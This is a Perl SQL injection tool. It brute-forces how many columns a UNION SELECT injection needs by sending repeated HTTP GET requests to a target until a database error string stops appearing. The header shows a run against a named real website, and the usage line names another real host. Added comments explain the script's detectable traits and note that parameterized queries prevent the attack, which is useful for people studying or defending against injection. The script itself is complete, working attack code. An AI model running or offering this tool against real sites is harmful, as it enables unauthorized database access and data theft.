#!/usr/bin/perl
#the cody find Table's No.
#for union select in (access,mysql,mssql)
#Codz by SuperHei
#Team #Security Angel
#Bugkidz Security Team
#Homepage
#http://www.4ngel.net
#http://www.darkne2s.org
# C:\tools>gettablenum.pl www.heibai.net 80 /down/show.php?id=5197 mysql_fetch_o
# The NO. is 2 .... Flase!
# The NO. is 3 .... Flase!
# The NO. is 4 .... Flase!
# The NO. is 5 .... Flase!
# The NO. is 6 .... Flase!
# The NO. is 7 .... Flase!
# The NO. is 8 .... Flase!
# The NO. is 9 .... Flase!
# The NO. is 10 .... Flase!
# The NO. is 11 .... Flase!
# The NO. is 12 .... Flase!
# The NO. is 13 .... Flase!
# The NO. is 14 .... Flase!
# The NO. is 15 .... Flase!
# The NO. is 16 .... Flase!
# The NO. is 17 .... Flase!
# The NO. is 18 .... Flase!
# The NO. is 19 .... OK!
# URl:
# %20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
# C:\tools>
#
# Reviewer notes (defensive summary of what this script does):
# - It appends "%20union%20select%201" plus a growing run of ",1" to the
#   supplied URL path and re-requests it up to 100 times, stopping at the
#   first response that no longer contains the error string given as the
#   fourth argument (e.g. "mysql_fetch_o").  It only counts columns for a
#   UNION probe; it presumes the query-string parameter is already
#   injectable.
# - Each probe is a single HTTP/1.0 GET carrying only Referer and Host
#   headers (no User-Agent), with the Host line terminated by a bare "\n"
#   and followed by a run of blank lines, and a Referer that points back
#   at the same host and path.  Together with the incrementing ",1"
#   sequence in the request path, these are the traits a WAF rule or a
#   web-log review can key on.
# - The sleep(1) in sock() sits after "return" and never executes, so the
#   probes arrive back-to-back as fast as the server answers.
# - No "use strict"/"use warnings"; @ARGV[0] etc. are one-element array
#   slices that yield the intended value but would warn.
# - Server-side root-cause mitigation is parameterized queries; not
#   echoing database error text to clients also removes the oracle this
#   script greps for.

use IO::Socket;

# Exactly four positional arguments are required: host, port, the path
# including its query string, and the error string to look for in replies.
$ARGC = @ARGV;
if ($ARGC != 4) {
    print "usage:$0 ww3.tty-1.net 808 /newdown/show.php?id=10 mysql_fetch_o\n";
    exit;
}
# @ARGV[0] is a single-element slice rather than $ARGV[0]; it evaluates to
# the same scalar here but is flagged under "use warnings".
$host = @ARGV[0];
$port =@ARGV[1];
$way = @ARGV[2];
$judge=$ARGV[3];   # interpolated, unescaped, into a regex below

# Iteration $i probes $i+2 columns: $d gains one more ",1" on every pass.
for ($i=0;$i<100;$i++){
    $d=",1".$d;
    $path1= "%20union%20select%201"."$d";
    # Hand-built HTTP/1.0 request: Referer and Host only, no User-Agent;
    # the Host line ends in "\n" (not "\r\n") and is followed by blank lines.
    $req = "GET $way$path1 HTTP/1.0\r\n".
        "Referer: http://$host$way\r\n".
        "Host:$host\n\n\n\n\n\n\n";
    @in = sock($req);
    # Count response lines that match $judge.  $judge is used as a regex,
    # so any metacharacters in it are interpreted rather than matched
    # literally.
    @num=grep /$judge/, @in;
    $size=@num;
    $n=$i+2;
    if ($size > 0) {
        # Error string still present: this column count is rejected.
        print "The NO. is $n .... Flase!\n" ;}
    else{
        # Error string absent: reported as success; print the suffix and stop.
        print "\nThe NO. is $n .... OK!\n" ;
        print "URl: \n$path1";exit;
    }
}

# Open a new TCP connection to the globals $host/$port, send $req verbatim,
# and return every line of the response.  Dies if the connection fails.
sub sock{
    my ($req) = @_;
    my $connection = IO::Socket::INET->new(Proto =>"tcp",
        PeerAddr =>$host,
        PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
    print $connection $req;
    my @res = <$connection>;   # list context: reads until EOF
    close $connection;
    return @res;
    sleep(1);   # unreachable (after return): no delay between probes
}